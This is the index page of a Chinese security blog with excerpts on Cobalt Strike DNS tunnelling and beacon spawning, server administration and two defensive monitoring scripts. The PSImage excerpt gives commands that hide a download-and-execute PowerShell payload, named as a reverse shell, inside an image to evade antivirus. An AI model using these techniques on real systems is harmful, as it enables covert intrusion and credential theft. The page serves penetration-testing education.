<!DOCTYPE html>
<html lang="en">
<!-- Head tag -->
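<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<!--Description-->
<meta name="description" content="专注于web和内网攻防研究,安全开发,安全运维,架构安全,热衷于高质量实用干货分享,提供全方位网络安全培训,更多请扫码关注自己博客下方的微信公众号,同时也期待更多志同道合的兄弟能一起并肩作战">
<!--Author-->
<meta name="author" content="klion">
<!--Open Graph Title-->
<meta property="og:title" content="klion's blog">
<!--Open Graph Description-->
<meta property="og:description" content="专注于web和内网攻防研究,安全开发,安全运维,架构安全,热衷于高质量实用干货分享,提供全方位网络安全培训,更多请扫码关注自己博客下方的微信公众号,同时也期待更多志同道合的兄弟能一起并肩作战">
<!--Open Graph Site Name-->
<meta property="og:site_name" content="klion's blog">
<!--Type page-->
<meta property="og:type" content="website">
<!--Page Cover-->
<meta name="twitter:card" content="summary">
<!-- Title -->
<title>klion's blog</title>
<!-- Third-party assets are referenced with an explicit https: scheme (not protocol-relative //)
     so they are never fetched over plain http if the page itself is ever served that way. -->
<!-- Bootstrap Core CSS (pinned version + SRI hash; the hash must be regenerated whenever the version changes) -->
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-alpha.2/css/bootstrap.min.css" integrity="sha384-y3tfxAZXuh4HwSYylfB+J125MxIs6mR5FOHamPBG064zB+AFeWH94NdvaCBm8qnd" crossorigin="anonymous">
<!-- Custom Fonts -->
<!-- NOTE(review): loaded from a CDN without an integrity attribute; add an SRI hash (plus crossorigin="anonymous") for this exact version -->
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css">
<!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
<script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
<![endif]-->
<!-- Gallery -->
<!-- NOTE(review): same as above — no SRI hash on this third-party stylesheet -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.css">
<!-- Custom CSS -->
<link rel="stylesheet" href="/css/style.css">
<!-- Google Analytics -->
</head>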
<body>
<div class="bg-gradient"></div>
<div class="bg-pattern"></div>
<!-- Menu -->
<!--Menu Links and Overlay-->
<div class="menu-bg">
<div class="menu-container">
<!-- Overlay menu: one entry per site section (the "blogs" entry points at /contact) -->
<ul>
<li class="menu-item"><a href="/">home</a></li>
<li class="menu-item"><a href="/archives">archives</a></li>
<li class="menu-item"><a href="/about">about me</a></li>
<li class="menu-item"><a href="/contact">blogs</a></li>
</ul>
</div>
</div>
<!--Hamburger Icon-->
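<!-- Hamburger toggle. The anchor has no text (the icon is drawn by CSS), so without an
     aria-label it is announced as an unnamed link; the label gives it an accessible name. -->
<nav aria-label="Menu toggle">
<a href="#menu" aria-label="Open menu"></a>
</nav>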
<div class="container">
<!-- Main Content -->
<div class="row">
<div class="col-sm-12">
<!--Title and Logo-->
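<header>
<div class="logo">
<!-- Icon-only home link: the <i> is decorative (aria-hidden), so the link itself carries the accessible name -->
<a href="/" aria-label="klion's blog – home"><i class="logo-icon fa" aria-hidden="true"></i></a>
<h1 id="main-title" class="title">klion's blog</h1>
</div>
</header>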
<section class="main">
<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/12/31/after-roding/">
关于接下来的路
</a>
</h1>
<div class="post-info">
<span class="date">2017-12-31</span>
<span class="category">
<a href="/categories/接下来的路/">接下来的路</a>
</span>
</div>
</div>
<div class="content">
<figure class="highlight"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">首先,在这里先跟兄弟们道个歉,可能从今天开始,我就要独自完成一整套稍微系统的内网渗透教程</div><div class="line">并准备整理出书,所以,博客的更新不得不先暂停一段时间,说实话,这也是思考很久之后的结果</div></pre></td></tr></table></figure>
<p>主要是考虑到以下原因<br><figure class="highlight"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">一、因为博客的内容过于松散杂乱,并不适合系统学习</div></pre></td></tr></table></figure></p>
<figure class="highlight"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">二、随着文章量越来越大,加上自己的不断成长总是不知不觉会发现之前文章中的很多不完美的地方</div><div class="line"> 但苦于个人精力有限并不是每个地方都能看到,所以现在才想全部重新系统的开始,对大家来讲,这无疑是件好事,当然,质量肯定会比之前那些要好很多很多</div></pre></td></tr></table></figure>
<figure class="highlight autohotkey"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">三、另外,也是想通过这种方式来时刻督促着自己学习和巩固,因为这对自己本身就是一种比较大的挑战</div><div class="line"> `你自己会` 和 `你能把别人清清楚楚的讲会` 是完全两个不同的级别,有些朋友可能深有体会</div></pre></td></tr></table></figure>
</div>
<a href="/2017/12/31/after-roding/" class="read-more">Read More</a>
</div>
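<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/12/28/cobalt-strike-dns/">
对 Cobalt Strike DNS隧道的理解与实战
</a>
</h1>
<div class="post-info">
<span class="date">2017-12-28</span>
<span class="category">
<a href="/categories/DNS隧道/">DNS隧道</a>
</span>
</div>
</div>
<div class="content">
<!-- <figure> is block-level and is not permitted inside <p>; the paragraph is closed before it
     so the parser does not have to auto-close it and leave a stray empty <p> behind the figure.
     The second paragraph was previously never closed at all. -->
<p>0x01 开始之前,有必要先稍微理解下基于<code>dns beacon的大致通信过程</code>,其实,非常非常简单,前提是你对dns的解析过程早已经烂透于心,不熟悉的朋友可以先去参考前段时间写的 <a href="https://klionsec.github.io/2017/12/11/Dns-tips/">[DNS 深度理解 一] </a>,把基础打扎实了,再回过头来理解这些东西自然就易如反掌了</p>
<figure class="highlight haml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">-<span class="ruby">> beacon shell会向指定的域名发起正常的dns查询</span></div><div class="line"> -<span class="ruby">> 中间依然是经过一系列的常规dns迭代及递归查询,大致过程就是,一直从根开始找,直到找到我们自己的ns服务器,最后再定位到团队服务器ip,仅此而已</span></div><div class="line"> -<span class="ruby">> 也就是说,第一次通信可能会慢点,后续就会稍微快些,不过说实话,dns再快也快不到哪里去,毕竟,我们要的是足够的隐蔽,而不一味追求速度,不然容易露点</span></div></pre></td></tr></table></figure>
<p>0x02 废话说完,我们就开始来尝试在实战中应用,首先,你要先买台<code>vps</code>,亚马逊或者<code>vultr</code>都挺不错的,自己也一直在用,之后装好系统,推荐用<code>ubuntu</code>,此处演示用的是<code>ubuntu 16.04.2</code>,具体的系统安装方法直接一路点点点就好了,全程傻瓜化,大概等个六七分钟,待系统初始化完成就可以用ssh连上去了</p>
</div>
<a href="/2017/12/28/cobalt-strike-dns/" class="read-more">Read More</a>
</div>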
<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/12/28/cobalt-strike-spawn/">
灵活使用 cobalt strike 的 `spawn` 功能
</a>
</h1>
<div class="post-info">
<span class="date">2017-12-28</span>
<span class="category">
<a href="/categories/spawn/">spawn</a>
</span>
</div>
</div>
<div class="content">
<p>0x01 关于 beacon 强大的派生功能<br><figure class="highlight clean"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">简单理解,所谓的`派生`,即仅仅通过一个beacon shell就可以再孵化出n个shell,shell与shell之间相当于以一种级联的形式存在的</div><div class="line">而团队服务器则位于这些节点的根节点位置,连接这些节点的则是`beacon隧道`自己,此功能可有效提高一个渗透团队成员间的协同作战能力,快速共享渗透资源</div><div class="line">当然,这也势必会在后期形成一个非常复杂的`渗透网络`,不过这也正好方便大家同时多点切入,说白点儿,其实就类似于一个大型的分布式入侵系统</div><div class="line">而这一切的根本保证就是我们在公网中的各个团队服务器节点,只要团队服务器节点不挂,权限就不太容易丢,除非活不干净,被人主动发现了</div><div class="line">因为其内部涉及到的细节还非常深,也绝不是一两句话就能说清楚的,但作为使用者,我们只需理解其大致的工作流程即可</div><div class="line">如果你自己真的有非常强的 RAT & 逆向 & 协议分析 能力,可以再继续深入研究,始终认为,cobalt strike 确实是一个非常值得深入学习的优秀样本</div><div class="line">如果能真正把它搞通透了,基础协议这一块对你来讲,基本就不再有盲区,废话不多说,我们还是在实战中多多体会吧...</div></pre></td></tr></table></figure></p>
</div>
<a href="/2017/12/28/cobalt-strike-spawn/" class="read-more">Read More</a>
</div>
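<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/12/26/powershell-pic-execute/">
通过图片免杀执行远程powershell代码
</a>
</h1>
<div class="post-info">
<span class="date">2017-12-26</span>
<span class="category">
<a href="/categories/PSImage/">PSImage</a>
</span>
</div>
</div>
<div class="content">
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">https:<span class="comment">//github.com/klionsec/Invoke-PSImage</span></div><div class="line">C:\>powershell -exec bypass</div><div class="line">PS C:\> Import-Module .\Invoke-PSImage<span class="selector-class">.ps1</span></div><div class="line">PS C:\> Invoke-PSImage -Script .\Download-Execute-PS<span class="selector-class">.ps1</span> -Image .\large<span class="selector-class">.JPG</span> -Out .\reverse_shell<span class="selector-class">.png</span> -Web</div></pre></td></tr></table></figure>
<p>免杀抓取系统用户明文密码</p>
<!-- The image paragraph was never closed; it is closed here (the trailing <br> rendered nothing).
     NOTE(review): alt="" marks this demo gif as decorative — if it carries information the reader
     needs, give it a short description instead. -->
<p><img src="/img/remote ps code.gif" alt=""></p>
</div>
<a href="/2017/12/26/powershell-pic-execute/" class="read-more">Read More</a>
</div>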
<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/12/25/modify-webshell/">
实时精准侦测站点目录中的各类 webshell
</a>
</h1>
<div class="post-info">
<span class="date">2017-12-25</span>
<span class="category">
<a href="/categories/webhack/">webhack</a>
</span>
</div>
</div>
<div class="content">
<figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div></pre></td><td class="code"><pre><div class="line"><span class="meta">#!/bin/bash</span></div><div class="line"><span class="comment"># author by klion</span></div><div class="line"><span class="comment"># 2017.12.25</span></div><div class="line"><span class="comment"># Delete webshell auto </span></div><div class="line"></div><div class="line">webshell_log=<span class="string">"/var/log/webshell.log"</span></div><div class="line">upload_shell=<span class="string">"/var/log/modify.tmp"</span></div><div class="line"></div><div class="line"><span class="comment"># 只要一检测到有新事件发生就立马打包上传检测</span></div><div class="line">[ -s <span class="variable">$webshell_log</span> ] &&{</div><div class="line"> awk -F <span class="string">" "</span> <span class="string">'{print $3}'</span> <span class="variable">$webshell_log</span> |grep -E <span class="string">".php$"</span>| sort -u > <span class="variable">$upload_shell</span></div><div class="line"> cat <span class="variable">$upload_shell</span> |xargs zip ./maybeshell.zip</div><div class="line"> <span class="built_in">echo</span> `curl https://scanner.baidu.com/enqueue -F archive=@maybeshell.zip` | mail -s <span class="string">"webshell detect url api"</span> klion@protonmail.com </div><div class="line"> sleep 5</div><div class="line"> > <span class="variable">$webshell_log</span> && > <span class="variable">$upload_shell</span> && rm -fr ./maybeshell.zip</div><div class="line">}</div></pre></td></tr></table></figure>
</div>
<a href="/2017/12/25/modify-webshell/" class="read-more">Read More</a>
</div>
<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/12/25/modify-hacked/">
用shell对指定站点进行简单的实时入侵预警
</a>
</h1>
<div class="post-info">
<span class="date">2017-12-25</span>
<span class="category">
<a href="/categories/webhack/">webhack</a>
</span>
</div>
</div>
<div class="content">
<figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div></pre></td><td class="code"><pre><div class="line"><span class="meta">#!/bin/bash</span></div><div class="line"><span class="comment"># author by klion</span></div><div class="line"><span class="comment"># 2017.12.25</span></div><div class="line"><span class="comment"># Real-time monitoring of Web Directory script</span></div><div class="line"></div><div class="line">web_dir=<span class="string">"/usr/local/nginx/html/bwapp/bWAPP/"</span></div><div class="line">oldnum=`wc -l web_history_db.log | awk -F <span class="string">" "</span> <span class="string">'{print $1}'</span>`</div><div class="line">newnum=`find <span class="variable">$web_dir</span> -<span class="built_in">type</span> f | wc -l`</div><div class="line">md5num=`md5sum -c web_history_db.log | grep -i FAILED | wc -l`</div><div class="line"></div><div class="line"><span class="comment"># 先对指定的站点目录创建指纹库</span></div><div class="line">[ ! 
-f web_history_db.log ] && {</div><div class="line"> find <span class="variable">$web_dir</span> -<span class="built_in">type</span> f | xargs md5sum > ./web_history_db.log</div><div class="line">}</div><div class="line"></div><div class="line"><span class="comment"># 和新文件对比指纹,如果发现不对,就马上发信通知,并带上被改动的文件路径一起</span></div><div class="line">[ <span class="variable">$md5num</span> -ne 0 ] && {</div><div class="line"> md5sum -c web_history_db.log | grep -i <span class="string">"FAILED"</span> | awk -F <span class="string">":"</span> <span class="string">'{print $1}'</span> > web_mod_`date +%Y-%m-%d-%H-%M-%S`.web.log</div><div class="line"> log_file=`ls -l *.web.log | head -n 1 | awk -F <span class="string">" "</span> <span class="string">'{print $9}'</span>`</div><div class="line"> mail -s <span class="string">"Your website may be hacked, Please check it as soon as possible"</span> klion@protonmail.com < <span class="variable">$log_file</span>;sleep 5</div><div class="line"> rm -fr <span class="variable">$log_file</span></div><div class="line">}</div><div class="line"></div><div class="line"><span class="comment"># 对比文件个数,发现不对,同样是立马发信,因为有可能要同时监控很多个站点目录,所以就顺便把具体的站点路径也带上了</span></div><div class="line">[ <span class="variable">$oldnum</span> -ne <span class="variable">$newnum</span> ] && {</div><div class="line"> <span class="built_in">echo</span> <span class="string">"website directory is <span class="variable">$web_dir</span>"</span> | mail -s <span class="string">"web directory have new file created "</span> klion@protonmail.com ;sleep 5</div><div class="line">}</div></pre></td></tr></table></figure>
</div>
<a href="/2017/12/25/modify-hacked/" class="read-more">Read More</a>
</div>
<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/12/23/keepalived-nginx/">
keepalived + nginx 初步实现高可用
</a>
</h1>
<div class="post-info">
<span class="date">2017-12-23</span>
<span class="category">
<a href="/categories/keepalived-高可用/">keepalived 高可用</a>
</span>
</div>
</div>
<div class="content">
<p>0x01 关于 keepalived<br><figure class="highlight autohotkey"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">早期是专为 `LVS` 设计的,主要用来监控LVS集群中各个节点状态</div><div class="line">内部基于 `VRRP协议` 实现,即`虚拟路由冗余协议`,从名字不难看出,协议本身是用于保证实现路由节点高可用的</div></pre></td></tr></table></figure></p>
<p>0x02 所谓的 VRRP 协议<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">简单来讲,即将N台提供相同功能的路由器组成一个路由器组,在这个组里有一个master和多个<span class="keyword">backup</span></div><div class="line">一般情况下,<span class="keyword">master</span>是由选举算法产生的,另外需要注意的是,只有在 <span class="keyword">master</span> 上才有一个用于对外提供服务的虚拟ip</div><div class="line">其它的<span class="keyword">backup</span>都是没有的,当<span class="keyword">master</span>在对外提供服务时,其它的<span class="keyword">backup</span>又在干什么呢</div><div class="line">很简单,当<span class="keyword">master</span>在对外提供服务时,它同时也在不停的向所有的<span class="keyword">backup</span>发送VRRP状态信息 <span class="string">`说白点儿就是心跳包`</span></div><div class="line">告诉所有<span class="keyword">backup</span>们,说,<span class="string">'我还没累死,你们先歇着,等我挂了,你们再上'</span>,然后,所有的<span class="keyword">backup</span>就会一直在那儿闲着不停地接收这样的状态信息</div><div class="line">当某一时刻,<span class="keyword">backup</span>突然没再接到这样的状态回应时,就说明<span class="keyword">master</span>已经光荣牺牲了</div><div class="line">所有的<span class="keyword">backup</span>会再重新用选举算法,把优先级最高的<span class="keyword">backup</span>升级为<span class="keyword">master</span>继续对外提供服务,以此保证了服务的持续可用性,即所谓的高可用</div></pre></td></tr></table></figure></p>
<p>0x03 借助 keepalived 在web上的高可用实现<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">首先,在所有需要进行高可用的web节点机器上部署好keepalived,并在节点中设置一个master,其它的则全部设为<span class="keyword">backup</span></div><div class="line">一旦<span class="keyword">backup</span>接收不到来自<span class="keyword">master</span>的心跳数据,即认为<span class="keyword">master</span>已挂掉,<span class="keyword">backup</span>随即就会接管<span class="keyword">master</span>的所有资源数据</div><div class="line">当<span class="keyword">master</span>状态恢复时,<span class="keyword">backup</span>会把所有的资源数据再移交给<span class="keyword">master</span>处理,此,即为最简单的web高可用实现</div></pre></td></tr></table></figure></p>
</div>
<a href="/2017/12/23/keepalived-nginx/" class="read-more">Read More</a>
</div>
<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/12/21/nginx-static-dynamic/">
利用 `nginx反向代理` 实现的动静分离
</a>
</h1>
<div class="post-info">
<span class="date">2017-12-21</span>
<span class="category">
<a href="/categories/动静分离/">动静分离</a>
</span>
</div>
</div>
<div class="content">
<p>0x01 关于 <code>动静分离</code><br><figure class="highlight qml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">主要用于一些较大型的站点架构,这样做一定程度上可以有效减轻后端节点压力,也就是说,有时候你在前端<span class="built_in">url</span>中看到的一个目录,其后端对应的很可能就是一个集群</div><div class="line">另外,这样会使网站更加静态化,利于缓存,可显著提高网站访问速度,有效实现前后端解耦,但这样无疑会加大开发的繁琐程度,前后端只能通过各种接口进行通信</div></pre></td></tr></table></figure></p>
<p>0x02 此次演示环境<br><figure class="highlight css"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="selector-tag">NginxHttp</span> <span class="selector-tag">ip</span>: 192<span class="selector-class">.168</span><span class="selector-class">.3</span><span class="selector-class">.49</span> 对应域名: <span class="selector-tag">reverse</span><span class="selector-class">.org</span> <span class="selector-tag">nginx</span>反向代理服务器</div><div class="line"><span class="selector-tag">OldLamp</span> <span class="selector-tag">ip</span>: 192<span class="selector-class">.168</span><span class="selector-class">.3</span><span class="selector-class">.45</span> 对应域名: <span class="selector-tag">www</span><span class="selector-class">.bwapp</span><span class="selector-class">.cc</span> 假设为动态服务器</div><div class="line"><span class="selector-tag">OldLnmp</span> <span class="selector-tag">ip</span>: 192<span class="selector-class">.168</span><span class="selector-class">.3</span><span class="selector-class">.42</span> 对应域名: <span class="selector-tag">test</span><span class="selector-class">.bwapp</span><span class="selector-class">.org</span> 假设为静态服务器</div></pre></td></tr></table></figure></p>
<p>0x03 务必先统一所有机器的host解析,因为等会儿要直接用域名的方式往后抛,如下<br><figure class="highlight lsl"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line"># vi /etc/hosts</div><div class="line"> <span class="number">192.168</span><span class="number">.3</span><span class="number">.42</span> test.bwapp.org bwapp.org</div><div class="line"> <span class="number">192.168</span><span class="number">.3</span><span class="number">.45</span> bwapp.cc www.bwapp.cc</div><div class="line"> <span class="number">192.168</span><span class="number">.3</span><span class="number">.75</span> lvs.org</div><div class="line"> <span class="number">192.168</span><span class="number">.3</span><span class="number">.49</span> reverse.org</div></pre></td></tr></table></figure></p>
</div>
<a href="/2017/12/21/nginx-static-dynamic/" class="read-more">Read More</a>
</div>
<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/12/20/ldap-sec/">
初探 LDAP 安全 [ 一 ]
</a>
</h1>
<div class="post-info">
<span class="date">2017-12-20</span>
<span class="category">
<a href="/categories/LDAP安全/">LDAP安全</a>
</span>
</div>
</div>
<div class="content">
<p>0x01 关于 ldap 的一些简单科普<br><figure class="highlight autohotkey"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">`ldap` 基于tcp/ip的轻量级目录访问协议,属于X.<span class="number">500</span>目录协议族的一个简化版本</div><div class="line">你可以暂时把它粗暴的理解成 `一种特殊类型的数据库` ,通常,这种数据库文件后缀都为`.ldif`,并使用特殊的节点查询语句来获取相应数据</div><div class="line">实际生产环境中,主要还是用它来做各种查询比较多,既是查询,也就意味着肯定会有大量的读操作</div><div class="line">虽然,ldap也支持一些简单的更新功能,即写,但一般都不会用,因为它在写方面的效率并不高</div><div class="line">如果真的是写比较多,直接用各种关系型数据库代替就好了,实在没必要用ldap,毕竟,术业有专攻</div><div class="line">另外,ldap 跨平台,功能简洁,易管理,配置,读性能也不错,亦可分布式部署`不知道是不是可以把它的分布式理解成windows域的目录树,目录林概念`</div><div class="line">用的最多的可能就是进行`集中身份验证`,最后,我们还需要知道的是,默认情况下,ldap的所有数据都是直接以明文传输的,容易被截获,不过好在它支持ssl</div></pre></td></tr></table></figure></p>
<p>0x02 其它的一些常用目录服务工具<br><figure class="highlight css"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line"><span class="selector-tag">X</span><span class="selector-class">.500</span> 过于庞大臃肿</div><div class="line"><span class="selector-tag">ldap</span> 轻量且配置简单</div><div class="line"><span class="selector-tag">windows</span>活动目录 有平台限制</div><div class="line"><span class="selector-tag">NIS</span> 个人暂时还没接触过</div></pre></td></tr></table></figure></p>
<p>0x03 了解ldap内部数据的大致存储方式<br><figure class="highlight autohotkey"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">和常规关系型数据库不同的是,ldap并非按照常规的库,表,字段方式来存储数据</div><div class="line">而是按照一种特殊的倒树状结构层级来组织管理数据,此处的树指的就是目录信息树,即`DIT`</div><div class="line">所谓的目录信息树其实相当于专门用来进行读操作的数据库</div><div class="line">在DIT内部则由N个条目`entry`所组成,就相当于我们常规数据库表中每条具体的记录</div><div class="line">而条目的内容则是由具有唯一标识名`DN`的属性[Attribute]及属性对应的值[value]所组成的这么一个集合</div><div class="line">条目为ldap中最基础的操作单位,通常对ldap的增删改查都是以条目为基本单元进行的</div></pre></td></tr></table></figure></p>
</div>
<a href="/2017/12/20/ldap-sec/" class="read-more">Read More</a>
</div>
<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/12/16/tomcat-sec/">
Tomcat 安全部署实战指南
</a>
</h1>
<div class="post-info">
<span class="date">2017-12-16</span>
<span class="category">
<a href="/categories/Tomcat-安全部署实战指南/">Tomcat 安全部署实战指南</a>
</span>
</div>
</div>
<div class="content">
<p>0x01 关于Tomcat,更多详情大家可直接参考百科说明<br><figure class="highlight avrasm"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="symbol">https:</span>//<span class="built_in">zh</span>.wikipedia<span class="meta">.org</span>/wiki/Apache_Tomcat</div></pre></td></tr></table></figure></p>
<p>此次演示环境<br><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">CentOS7 x86_64 <span class="built_in">ip</span>: <span class="number">192.168</span><span class="meta">.3</span><span class="meta">.64</span></div><div class="line">Apache Tomcat/<span class="number">8.5</span><span class="meta">.24</span> 建议大家使用较新版的稳定版本</div></pre></td></tr></table></figure></p>
<p>0x02 首先,在正式部署Tomcat之前,需要先来准备好jdk环境,因为毕竟底层还是在靠java来处理,所以必须要先得有java的运行环境才行,其实,在实际生产环境中,也可以单独使用<code>jre</code>,不过个人觉得这和安全的关系并不大,试想,如果你手里都已经拿到了一个可以运行java的环境了,我在本地用对应版本的jdk编译好了再丢上运行也是一样,防不住啥,太泛泛<br><figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div></pre></td><td class="code"><pre><div class="line"><span class="meta">#</span><span class="bash"> tar xf jdk-8u151-linux-x64.tar.gz</span></div><div class="line"><span class="meta">#</span><span class="bash"> mv jdk1.8.0_151/ /usr/<span class="built_in">local</span>/</span></div><div class="line"><span class="meta">#</span><span class="bash"> ln -s /usr/<span class="built_in">local</span>/jdk1.8.0_151/ /usr/<span class="built_in">local</span>/jdk</span></div><div class="line"><span class="meta">#</span><span class="bash"> tar xf apache-tomcat-8.5.24.tar.gz</span></div><div class="line"><span class="meta">#</span><span class="bash"> mv apache-tomcat-8.5.24 /usr/<span class="built_in">local</span>/</span></div><div class="line"><span class="meta">#</span><span class="bash"> ln -s /usr/<span class="built_in">local</span>/apache-tomcat-8.5.24/ /usr/<span class="built_in">local</span>/tomcat</span></div><div class="line"><span class="meta">#</span><span class="bash"> ll /usr/<span class="built_in">local</span>/</span></div><div class="line"><span class="meta">#</span><span class="bash"> vi /etc/profile</span></div><div class="line"> export JAVA_HOME=/usr/local/jdk/ </div><div class="line"> export PATH=$JAVA_HOME/bin:$JAVA_HOME/jre/bin:$PATH </div><div class="line"> export 
CLASSPATH=.$CLASSPATH:$JAVA_HOME/lib:$JAVA_HOME/jre/lib:$JAVA_HOME/lib/tools.jar</div><div class="line"> export TOMCAT_HOME=/usr/local/tomcat</div><div class="line"><span class="meta">#</span><span class="bash"> <span class="built_in">source</span> /etc/profile</span></div><div class="line"><span class="meta">#</span><span class="bash"> java -version</span></div><div class="line"><span class="meta">#</span><span class="bash"> javac</span></div></pre></td></tr></table></figure></p>
</div>
<a href="/2017/12/16/tomcat-sec/" class="read-more">Read More</a>
</div>
<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/12/12/samba-sec/">
跨平台快速文件共享 Samba
</a>
</h1>
<div class="post-info">
<span class="date">2017-12-12</span>
<span class="category">
<a href="/categories/Samba/">Samba</a>
</span>
</div>
</div>
<div class="content">
<p>0x01 关于samba<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">主要用于实现不同系统平台间的文件共享,配置非常简单,轻量,适合用于常规办公内网环境中</div><div class="line">linux <span class="tag"><<span class="name">==</span>></span> windows <span class="tag"><<span class="name">==</span>></span> unix</div></pre></td></tr></table></figure></p>
<p>此次演示环境<br><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">CentOS6<span class="meta">.9</span> x86_64 <span class="built_in">ip</span>:<span class="number">192.168</span><span class="meta">.3</span><span class="meta">.55</span> samba服务器</div><div class="line">CentOS6<span class="meta">.9</span> x86_64 <span class="built_in">ip</span>:<span class="number">192.168</span><span class="meta">.3</span><span class="meta">.57</span> 用来模拟smb客户端进行访问测试</div></pre></td></tr></table></figure></p>
<p>0x02 samba服务默认所监听的端口<br><figure class="highlight routeros"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">137/udp,138/udp nmb 进程提供netbios解析,以满足基于 CIFS 协议的共享访问环境</div><div class="line">138/tcp,445/tcp<span class="built_in"> smb </span>进程主要为客户端提供文件共享,打印机服务以及用户权限验证</div></pre></td></tr></table></figure></p>
<p>0x03 使用samba客户端工具 <code>smbclient</code>,其实有些类似于ftp的客户端工具,也是一种交互式的访问</p>
<p><code>在linux下使用smbclient访问windows中的共享目录</code><br><figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="meta">#</span><span class="bash"> smbclient -L 192.168.3.23 -U administrator</span></div><div class="line"><span class="meta">#</span><span class="bash"> smbclient //192.168.3.23/linux_dir -U dcadmin</span></div><div class="line"><span class="meta">#</span><span class="bash"> mount -t cifs //192.168.3.23/linux_dir /mnt/windows/ -o username=dcadmin 注意,此处要使用cifs协议进行挂载</span></div></pre></td></tr></table></figure></p>
</div>
<a href="/2017/12/12/samba-sec/" class="read-more">Read More</a>
</div>
<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/12/11/Dns-tips/">
DNS 深度理解 [ 一 ]
</a>
</h1>
<div class="post-info">
<span class="date">2017-12-11</span>
<span class="category">
